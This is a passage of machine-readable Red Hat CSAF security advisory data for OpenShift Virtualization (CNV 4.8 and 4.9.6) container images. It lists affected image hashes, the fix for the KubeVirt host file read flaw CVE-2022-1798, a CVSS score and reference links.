"container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "product": { "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "product_id": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "product_identification_helper": { "purl": "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8\u0026tag=v4.8.7-5" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "product": { "name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "product_id": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion\u0026tag=v4.8.7-4" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "product": { "name": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "product_id": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware\u0026tag=v4.8.7-4" } } }, { "category": "product_version", "name": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "product": { "name": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "product_id": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "product_identification_helper": { "purl": "pkg:oci/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator\u0026tag=v4.8.7-4" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "product": { "name": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "product_id": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8\u0026tag=v4.8.7-4" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "product": { "name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "product_id": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8\u0026tag=v4.8.7-4" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", "product": { "name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", "product_id": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8\u0026tag=v4.8.7-4" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64 as a component of CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64" }, "product_reference": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "relates_to_product_reference": "8Base-CNV-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64 as a component of CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64" }, "product_reference": "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "relates_to_product_reference": "8Base-CNV-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64 as a component of CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64" }, "product_reference": "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "relates_to_product_reference": "8Base-CNV-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64 as a component of CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64" }, "product_reference": "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "relates_to_product_reference": "8Base-CNV-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64 as a component of CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64" }, "product_reference": "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "relates_to_product_reference": "8Base-CNV-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64 as a component of CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64" }, "product_reference": "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "relates_to_product_reference": "8Base-CNV-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64 as a component of CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64" }, "product_reference": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", "relates_to_product_reference": "8Base-CNV-4.8" } ] }, "vulnerabilities": [ { "acknowledgments": [ { "names": [ "Oliver Brooks and James Klopchic" ], "organization": "NCC Group" } ], "cve": "CVE-2022-1798", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2022-08-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2117872" } ], "notes": [ { "category": "description", "text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", "title": "Vulnerability description" }, { "category": "summary", "text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1798" }, { "category": "external", "summary": "RHBZ#2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1798" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798" }, { "category": "external", "summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm" } ], "release_date": "2022-08-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-10-11T16:02:33+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6890" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs" } ] }
rhsa-2022_6681
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "This advisory contains the following OpenShift Virtualization 4.9.6 images:\n\nRHEL-8-CNV-4.9\n==============\ncnv-must-gather-container-v4.9.6-7\nkubevirt-template-validator-container-v4.9.6-6\nkubevirt-ssp-operator-container-v4.9.6-5\nvirt-cdi-uploadserver-container-v4.9.6-4\nvirt-cdi-cloner-container-v4.9.6-4\nvirt-cdi-importer-container-v4.9.6-4\nvirt-cdi-uploadproxy-container-v4.9.6-4\nvirt-cdi-apiserver-container-v4.9.6-4\nvirt-cdi-controller-container-v4.9.6-4\nvirt-cdi-operator-container-v4.9.6-4\nhostpath-provisioner-container-v4.9.6-3\nhyperconverged-cluster-webhook-container-v4.9.6-3\nhyperconverged-cluster-operator-container-v4.9.6-3\nnode-maintenance-operator-container-v4.9.6-4\nkubevirt-vmware-container-v4.9.6-3\nkubevirt-v2v-conversion-container-v4.9.6-3\novs-cni-plugin-container-v4.9.6-3\ncnv-containernetworking-plugins-container-v4.9.6-3\nbridge-marker-container-v4.9.6-4\novs-cni-marker-container-v4.9.6-3\nkubemacpool-container-v4.9.6-4\nkubernetes-nmstate-handler-container-v4.9.6-5\ncluster-network-addons-operator-container-v4.9.6-5\nvirt-controller-container-v4.9.6-9\nvirt-handler-container-v4.9.6-9\nvirt-api-container-v4.9.6-9\nvirt-operator-container-v4.9.6-9\nvirt-artifacts-server-container-v4.9.6-9\nvirt-launcher-container-v4.9.6-9\nlibguestfs-tools-container-v4.9.6-9\nvirtio-win-container-v4.9.6-3\nhostpath-provisioner-operator-container-v4.9.6-3\nvm-import-operator-container-v4.9.6-3\nvm-import-controller-container-v4.9.6-3\nvm-import-virtv2v-container-v4.9.6-3\nhco-bundle-registry-container-v4.9.6-51\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:6681", "url": "https://access.redhat.com/errata/RHSA-2022:6681" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "2092269", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092269" }, { "category": "external", "summary": "2097313", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097313" }, { "category": "external", "summary": "2101174", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101174" }, { "category": "external", "summary": "2110783", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110783" }, { "category": "external", "summary": "2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "2118317", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118317" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6681.json" } ], "title": "Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update", "tracking": { "current_release_date": "2024-11-22T18:27:44+00:00", "generator": { "date": "2024-11-22T18:27:44+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2022:6681", "initial_release_date": "2022-09-22T08:16:30+00:00", "revision_history": [ { "date": "2022-09-22T08:16:30+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-09-22T08:16:30+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-22T18:27:44+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "CNV 4.9 for RHEL 8", "product": { "name": "CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9", "product_identification_helper": { "cpe": "cpe:/a:redhat:container_native_virtualization:4.9::el8" } } } ], "category": "product_family", "name": "OpenShift Virtualization" }, { "branches": [ { "category": "product_version", "name": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "product": { "name": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "product_id": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "product_identification_helper": { "purl": "pkg:oci/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "product": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.9.6-5" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "product": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "product": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.9.6-7" } } }, { "category": "product_version", "name": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "product": { "name": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "product_id": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "product_identification_helper": { "purl": "pkg:oci/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.9.6-51" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "product": { "name": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "product_id": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "product_identification_helper": { "purl": "pkg:oci/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "product": { "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "product_id": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "product_identification_helper": { "purl": 